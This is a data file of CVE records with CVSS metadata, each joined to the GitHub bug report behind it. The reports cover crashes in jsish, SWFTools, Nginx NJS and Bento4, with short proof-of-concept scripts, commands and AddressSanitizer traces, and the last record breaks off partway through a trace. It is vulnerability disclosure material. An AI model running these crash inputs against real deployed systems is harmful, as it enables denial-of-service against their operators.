"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/pcmacdon/jsish/issues/14"
},
{
"source": "[email protected]",
"tags": [
"Broken Link"
],
"url": "https://jsish.org/fossil/jsi2/tktview?name=3e211e44b1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:*:*:*:*:*:*:*:*",
"matchCriteriaId": "633EAFF5-6C2C-4EA3-8E68-C899A78ECC1E",
"versionEndExcluding": null,
"versionEndIncluding": "3.0.11",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/pcmacdon/jsish/issues/14 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"pcmacdon",
"jsish"
] | DongzhuoZhao added on 2020-05-11 03:19:36:
git version:
4603977ef0ffdaf3d0f641ff6a361aa26e36974d
save follow testcase as .js format :
v0=/a/g;
var v1="a";
(v1).replace(v0,isFinite);
run:
./jsimin poc.js
Result:
zdz@ubuntu:~/jsish$ ./jsimin /home/zdz/debugBug/jsi/bug/poc.js
Segmentation fault (core dumped)
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x000056038750129c in StringReplaceCmd (interp=0x5603881f2260,
args=0x560388254f30, _this=0x560388254f70, ret=0x7ffe29bd5ed0,
funcPtr=0x5603882047d0) at ./src/jsiString.c:656
656 maxArgs = repVal->d.obj->d.fobj->func->argnames->argCnt;
(rr) bt
#0 0x000056038750129c in StringReplaceCmd (interp=0x5603881f2260,
args=0x560388254f30, _this=0x560388254f70, ret=0x7ffe29bd5ed0,
funcPtr=0x5603882047d0) at ./src/jsiString.c:656
#1 0x0000560387560285 in jsi_FunctionSubCall (interp=0x5603881f2260,
args=0x560388254f30, _this=0x560388254f70, ret=0x7ffe29bd5ed0,
tocall=0x56038824e560, discard=1) at ./src/jsiEval.c:857
#2 0x0000560387560767 in jsiEvalFunction (ps=0x56038824d780,
ip=0x560388250af0, discard=1) at ./src/jsiEval.c:918
#3 0x000056038756238b in jsi_evalcode_sub (ps=0x56038824d780,
opcodes=0x56038824e640, scope=0x560388214950,
currentScope=0x5603881fe3f0, _this=0x5603881fe3f0, vret=0x560388231c90)
at ./src/jsiEval.c:1308
#4 0x000056038756810c in jsi_evalcode (ps=0x56038824d780, func=0x0,
opcodes=0x56038824e640, scope=0x560388214950, fargs=0x5603881fe3f0,
_this=0x5603881fe3f0, vret=0x7ffe29bd64b0) at ./src/jsiEval.c:2156
#5 0x0000560387569c5d in jsi_evalStrFile (interp=0x5603881f2260,
path=0x56038824c2e0,
str=0x7ffe29bd6594 "var v0 = /((?!B))|(\\S)/g;\nvar v1=\"a a\";\n(v1).replace(v0,isFinite);\n\n", flags=73, level=0) at ./src/jsiEval.c:2470
#6 0x000056038756a005 in Jsi_EvalFile (interp=0x5603881f2260,
fname=0x56038824c2e0, flags=73) at ./src/jsiEval.c:2519
#7 0x00005603874e521c in Jsi_Main (opts=0x7ffe29bddc20)
at ./src/jsiInterp.c:922
| Illegal memory dereference | https://api.github.com/repos/pcmacdon/jsish/issues/14/comments | 2 | 2020-05-11T16:20:40Z | 2020-05-13T07:03:14Z | https://github.com/pcmacdon/jsish/issues/14 | 616,010,782 | 14 |
CVE-2023-26991 | 2023-04-04T15:15:09.183 | SWFTools v0.9.2 was discovered to contain a stack-use-after-scope in the swf_ReadSWF2 function in lib/rfxswf.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/matthiaskramm/swftools/issues/196"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:swftools:swftools:0.9.2:*:*:*:*:*:*:*",
"matchCriteriaId": "B6149BA0-2082-45B7-9B43-CAC2F1768770",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/matthiaskramm/swftools/issues/196 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"matthiaskramm",
"swftools"
] | ### Env
Ubuntu 18.04
clang 11.0
swfdump v0.9.2 a part of Swftools v0.9.2
### Reproduce
POC: [poc](https://github.com/yiliang-neo/POC/raw/main/swfdump/POC-swfdump-use-after-scope.swf)
command line:
```
swfdump -D poc
```
### Debug Info
```
==13979==ERROR: AddressSanitizer: stack-use-after-scope on address 0x7ffd30700648 at pc 0x000000581b59 bp 0x7ffd30700550 sp 0x7ffd30700548
READ of size 4 at 0x7ffd30700648 thread T0
#0 0x581b58 in swf_ReadSWF2 /home/swftools//lib/rfxswf.c:1607:18
#1 0x581f8d in swf_ReadSWF /home/swftools/lib/rfxswf.c:1627:10
#2 0x4f9aaa in main /home/swftools/src/swfdump.c:1177:12
#3 0x7f9dd2219c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
#4 0x41bcb9 in _start (/home/swftoolssrc/swfdump+0x41bcb9)
Address 0x7ffd30700648 is located in stack of thread T0 at offset 232 in frame
#0 0x580ccf in swf_ReadSWF2 /home/swftools/lib/rfxswf.c:1561
This frame has 3 object(s):
[32, 64) 'b' (line 1565)
[96, 152) 't1' (line 1568)
[192, 240) 'zreader' (line 1569) <== Memory access at offset 232 is inside this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-use-after-scope /home/swftools/lib/rfxswf.c:1607:18 in swf_ReadSWF2
Shadow bytes around the buggy address:
0x1000260d8070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000260d8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000260d8090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000260d80a0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
0x1000260d80b0: f8 f8 f8 f8 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8 f8 f2
=>0x1000260d80c0: f2 f2 f2 f2 f8 f8 f8 f8 f8[f8]f3 f3 f3 f3 f3 f3
0x1000260d80d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000260d80e0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
0x1000260d80f0: 00 00 00 00 00 00 f3 f3 f3 f3 f3 f3 00 00 00 00
0x1000260d8100: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
0x1000260d8110: f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f8 f2 f2 f2 f8 f2
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==13979==ABORTING
```
| stack-use-after-scope exists in function swf_ReadSWF2 in lib/rfxswf.c | https://api.github.com/repos/swftools/swftools/issues/196/comments | 0 | 2023-02-16T07:45:42Z | 2023-03-13T07:41:33Z | https://github.com/swftools/swftools/issues/196 | 1,587,191,755 | 196 |
CVE-2023-27727 | 2023-04-09T20:15:56.650 | Nginx NJS v0.7.10 was discovered to contain a segmentation violation via the function njs_function_frame at src/njs_function.h. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/nginx/njs/issues/617"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:0.7.10:*:*:*:*:*:*:*",
"matchCriteriaId": "2784ECC5-66FE-4666-9B7B-6DC080357DEE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/nginx/njs/issues/617 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"nginx",
"njs"
] | Environment
```
commit: 4c1e23326e1c30e4e051bf588bfc1aaa63954976
version: 0.7.10
Build :
./configure --cc=clang --address-sanitizer=YES
make
```
Poc
```js
const v1 = EvalError(EvalError);
Object.defineProperty(v1, "message", { configurable: true, set: EvalError });
delete v1.message;
EvalError(v1);
```
Asan
```
==31577==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000030 (pc 0x00000053ee4e bp 0x7ffc9539f0f0 sp 0x7ffc9539f0d0 T0)
==31577==The signal is caused by a READ memory access.
==31577==Hint: address points to the zero page.
#0 0x53ee4e in njs_function_frame /root/njs/src/njs_function.h:155:9
#1 0x53ee4e in njs_function_call2 /root/njs/src/njs_function.c:508:11
#2 0x51f100 in njs_function_apply /root/njs/src/njs_function.h:192:12
#3 0x51f100 in njs_object_property /root/njs/src/njs_object_prop.c:138:12
#4 0x553f76 in njs_error_to_string2 /root/njs/src/njs_error.c:619:11
#5 0x55528d in njs_error_prototype_to_string /root/njs/src/njs_error.c:682:12
#6 0x53ff0a in njs_function_native_call /root/njs/src/njs_function.c:645:11
#7 0x53ef49 in njs_function_frame_invoke /root/njs/src/njs_function.c:692:16
#8 0x53ee73 in njs_function_call2 /root/njs/src/njs_function.c:513:12
#9 0x4d5b96 in njs_function_apply /root/njs/src/njs_function.h:192:12
#10 0x4d5b96 in njs_value_to_primitive /root/njs/src/njs_value.c:167:23
#11 0x554976 in njs_value_to_string /root/njs/src/njs_value_conversion.h:189:19
#12 0x554976 in njs_error_constructor /root/njs/src/njs_error.c:309:19
#13 0x53ff0a in njs_function_native_call /root/njs/src/njs_function.c:645:11
#14 0x53ef49 in njs_function_frame_invoke /root/njs/src/njs_function.c:692:16
#15 0x4e77c2 in njs_vmcode_interpreter /root/njs/src/njs_vmcode.c:1512:15
#16 0x4de86a in njs_vm_start /root/njs/src/njs_vm.c:553:11
#17 0x4cad73 in njs_process_script /root/njs/src/njs_shell.c:952:19
#18 0x4cb556 in njs_process_file /root/njs/src/njs_shell.c:678:11
#19 0x4c94be in main /root/njs/src/njs_shell.c:335:15
#20 0x7f4f0bc58c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
#21 0x41f1d9 in _start (/root/njs/build/njs+0x41f1d9)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/njs/src/njs_function.h:155:9 in njs_function_frame
```
| SEGV src/njs_function.h:155:9 in njs_function_frame | https://api.github.com/repos/nginx/njs/issues/617/comments | 0 | 2023-02-21T02:44:30Z | 2023-02-28T06:16:14Z | https://github.com/nginx/njs/issues/617 | 1,592,691,159 | 617 |
CVE-2023-27728 | 2023-04-09T20:15:56.703 | Nginx NJS v0.7.10 was discovered to contain a segmentation violation via the function njs_dump_is_recursive at src/njs_vmcode.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/nginx/njs/issues/618"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:0.7.10:*:*:*:*:*:*:*",
"matchCriteriaId": "2784ECC5-66FE-4666-9B7B-6DC080357DEE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/nginx/njs/issues/618 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"nginx",
"njs"
] | Environment
```
commit: 4c1e23326e1c30e4e051bf588bfc1aaa63954976
version: 0.7.10
Build :
./configure --cc=clang --address-sanitizer=YES
make
```
Poc
```js
Object.defineProperty([], 'a', { configurable: true, enumerable: true, get: Object});
```
Asan
```
==31165==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000022 (pc 0x00000053426f bp 0x7ffef5d7b170 sp 0x7ffef5d7a3e0 T0)
==31165==The signal is caused by a READ memory access.
==31165==Hint: address points to the zero page.
#0 0x53426f in njs_dump_is_recursive /root/njs/src/njs_json.c
#1 0x53426f in njs_vm_value_dump /root/njs/src/njs_json.c:2113:13
#2 0x4e0374 in njs_vm_retval_dump /root/njs/src/njs_vm.c:1004:12
#3 0x4c984b in njs_console_output /root/njs/src/njs_shell.c:885:13
#4 0x4cd050 in njs_process_output /root/njs/src/njs_shell.c:1010:9
#5 0x4cad81 in njs_process_script /root/njs/src/njs_shell.c:960:5
#6 0x4cb556 in njs_process_file /root/njs/src/njs_shell.c:678:11
#7 0x4c94be in main /root/njs/src/njs_shell.c:335:15
#8 0x7f1864672c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
#9 0x41f1d9 in _start (/root/njs/build/njs+0x41f1d9)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/njs/src/njs_json.c in njs_dump_is_recursive
```
| SEGV src/njs_json.c in njs_dump_is_recursive | https://api.github.com/repos/nginx/njs/issues/618/comments | 0 | 2023-02-21T02:46:42Z | 2023-02-28T06:16:14Z | https://github.com/nginx/njs/issues/618 | 1,592,692,581 | 618 |
CVE-2023-27729 | 2023-04-09T20:15:56.740 | Nginx NJS v0.7.10 was discovered to contain an illegal memcpy via the function njs_vmcode_return at src/njs_vmcode.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/nginx/njs/issues/619"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:0.7.10:*:*:*:*:*:*:*",
"matchCriteriaId": "2784ECC5-66FE-4666-9B7B-6DC080357DEE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/nginx/njs/issues/619 | [
"Issue Tracking",
"Patch"
] | github.com | [
"nginx",
"njs"
] | This is new one, different from another
Poc will be upload later
Asan
```
==20795==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fd4936f313f bp 0x7ffd1d582440 sp 0x7ffd1d581bf8 T0)
==20795==The signal is caused by a WRITE memory access.
==20795==Hint: address points to the zero page.
#0 0x7fd4936f313f in memcpy (/lib/x86_64-linux-gnu/libc.so.6+0xbb13f)
#1 0x4983f1 in __asan_memcpy (/root/njs/build/njs+0x4983f1)
#2 0x4f7295 in njs_vmcode_return /root/njs/src/njs_vmcode.c:2690:29
#3 0x4f8857 in njs_vmcode_await /root/njs/src/njs_vmcode.c:2843:12
#4 0x4e425b in njs_vmcode_interpreter /root/njs/src/njs_vmcode.c:1645:15
#5 0x53f50c in njs_function_lambda_call /root/njs/src/njs_function.c:608:11
#6 0x5e89e6 in njs_async_function_frame_invoke /root/njs/src/njs_async.c:32:11
#7 0x53ef25 in njs_function_frame_invoke /root/njs/src/njs_function.c:688:16
#8 0x4e77c2 in njs_vmcode_interpreter /root/njs/src/njs_vmcode.c:1512:15
#9 0x4de86a in njs_vm_start /root/njs/src/njs_vm.c:553:11
#10 0x4cad73 in njs_process_script /root/njs/src/njs_shell.c:952:19
#11 0x4cb556 in njs_process_file /root/njs/src/njs_shell.c:678:11
#12 0x4c94be in main /root/njs/src/njs_shell.c:335:15
#13 0x7fd493659c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
#14 0x41f1d9 in _start (/root/njs/build/njs+0x41f1d9)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbb13f) in memcpy
```
| illegal memcpy during njs_vmcode_return in src/njs_vmcode.c | https://api.github.com/repos/nginx/njs/issues/619/comments | 0 | 2023-02-24T08:36:06Z | 2023-03-04T01:12:48Z | https://github.com/nginx/njs/issues/619 | 1,598,176,339 | 619 |
CVE-2023-27730 | 2023-04-09T20:15:56.780 | Nginx NJS v0.7.10 was discovered to contain a segmentation violation via the function njs_lvlhsh_find at src/njs_lvlhsh.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/nginx/njs/issues/615"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:0.7.10:*:*:*:*:*:*:*",
"matchCriteriaId": "2784ECC5-66FE-4666-9B7B-6DC080357DEE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/nginx/njs/issues/615 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"nginx",
"njs"
] | Environment
```
commit: 4c1e23326e1c30e4e051bf588bfc1aaa63954976
version: 0.7.10
Build :
./configure --cc=clang --address-sanitizer=YES
make
```
Poc
```js
const v1 = URIError();
v1.name = URIError();
URIError && v1;
```
Asan
```
==21471==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000726f (pc 0x0000004cde74 bp 0x7ffcd78018d0 sp 0x7ffcd78018d0 T0)
==21471==The signal is caused by a READ memory access.
#0 0x4cde74 in njs_lvlhsh_find /root/njs/src/njs_lvlhsh.c:176:16
#1 0x51efff in njs_object_property /root/njs/src/njs_object_prop.c:104:15
#2 0x553f76 in njs_error_to_string2 /root/njs/src/njs_error.c:619:11
#3 0x553b9d in njs_error_to_string /root/njs/src/njs_error.c:689:12
#4 0x535773 in njs_dump_terminal /root/njs/src/njs_json.c:1848:15
#5 0x533591 in njs_vm_value_dump /root/njs/src/njs_json.c:1980:15
#6 0x4e0374 in njs_vm_retval_dump /root/njs/src/njs_vm.c:1004:12
#7 0x4c984b in njs_console_output /root/njs/src/njs_shell.c:885:13
#8 0x4cd050 in njs_process_output /root/njs/src/njs_shell.c:1010:9
#9 0x4cad81 in njs_process_script /root/njs/src/njs_shell.c:960:5
#10 0x4cb556 in njs_process_file /root/njs/src/njs_shell.c:678:11
#11 0x4c94be in main /root/njs/src/njs_shell.c:335:15
#12 0x7f5056c67c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
#13 0x41f1d9 in _start (/root/njs/build/njs+0x41f1d9)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/njs/src/njs_lvlhsh.c:176:16 in njs_lvlhsh_find
```
| SEGV src/njs_lvlhsh.c:176:16 in njs_lvlhsh_find | https://api.github.com/repos/nginx/njs/issues/615/comments | 0 | 2023-02-21T02:38:22Z | 2023-02-28T06:16:13Z | https://github.com/nginx/njs/issues/615 | 1,592,687,556 | 615 |
CVE-2023-29576 | 2023-04-11T21:15:30.510 | Bento4 v1.6.0-639 was discovered to contain a segmentation violation via the AP4_TrunAtom::SetDataOffset(int) function in Ap4TrunAtom.h. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/844"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/z1r00/fuzz_vuln/blob/main/Bento4/mp4decrypt/sigv/readme.md"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*",
"matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/axiomatic-systems/Bento4/issues/844 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"axiomatic-systems",
"Bento4"
] |
# Summary
Hello, I found SEGV bug in Ap4TrunAtom.h
# BUG
SEGV /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4TrunAtom.h:80:80 in AP4_TrunAtom::SetDataOffset(int)
# Build
ubuntu 20.04
```
export CC=clang
export CXX=clang++
export CFLAGS="-fsanitize=address -g"
export CXXFLAGS="-fsanitize=address -g"
mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Release ..
make
```
```
./mp42aac poc4.mp4 /dev/null
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1110587==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000028 (pc 0x000000562a98 bp 0x7ffdb6c29220 sp 0x7ffdb6c28e80 T0)
==1110587==The signal is caused by a WRITE memory access.
==1110587==Hint: address points to the zero page.
#0 0x562a98 in AP4_TrunAtom::SetDataOffset(int) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4TrunAtom.h:80:80
#1 0x562a98 in AP4_Processor::ProcessFragments(AP4_MoovAtom*, AP4_List<AP4_AtomLocator>&, AP4_ContainerAtom*, AP4_SidxAtom*, unsigned long long, AP4_ByteStream&, AP4_ByteStream&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4Processor.cpp:285:19
#2 0x567c4f in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4Processor.cpp:721:18
#3 0x4c7b98 in main /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Apps/Mp4Decrypt/Mp4Decrypt.cpp:258:29
#4 0x7ff6f6ed9082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082)
#5 0x41c63d in _start (/home/ubuntu/fuzz/asan_bento4/Bento4/cmakebuild/mp4decrypt+0x41c63d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4TrunAtom.h:80:80 in AP4_TrunAtom::SetDataOffset(int)
==1110587==ABORTING
```
# poc
https://github.com/z1r00/fuzz_vuln/blob/main/Bento4/mp4decrypt/sigv/poc5.zip
| SEGV Ap4TrunAtom.h:80:80 in AP4_TrunAtom::SetDataOffset(int) | https://api.github.com/repos/axiomatic-systems/Bento4/issues/844/comments | 0 | 2023-03-14T12:42:26Z | 2024-02-17T17:48:33Z | https://github.com/axiomatic-systems/Bento4/issues/844 | 1,623,402,397 | 844 |
CVE-2023-29574 | 2023-04-12T13:15:07.637 | Bento4 v1.6.0-639 was discovered to contain an out-of-memory bug in the mp42avc component. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/841"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/z1r00/fuzz_vuln/blob/main/Bento4/mp42avc/readme.md"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*",
"matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/axiomatic-systems/Bento4/issues/841 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] |
# Summary
Hello, I found out-of-memory bug in mp42avc
# BUG
out-of-memory (/home/ubuntu/fuzz/asan_bento4/Bento4/cmakebuild/mp42avc+0x4c44dd) in operator new(unsigned long)
# Build
ubuntu 20.04
```
export CC=clang
export CXX=clang++
export CFLAGS="-fsanitize=address -g"
export CXXFLAGS="-fsanitize=address -g"
mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Release ..
make
```
```
./mp42avc poc3.mp4 /dev/null
=================================================================
==1349287==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x400000010 bytes
#0 0x4c44dd in operator new(unsigned long) (/home/ubuntu/fuzz/asan_bento4/Bento4/cmakebuild/mp42avc+0x4c44dd)
#1 0x6063ae in AP4_Array<AP4_TrunAtom::Entry>::EnsureCapacity(unsigned int) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4Array.h:172:25
#2 0x6063ae in AP4_Array<AP4_TrunAtom::Entry>::SetItemCount(unsigned int) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4Array.h:210:25
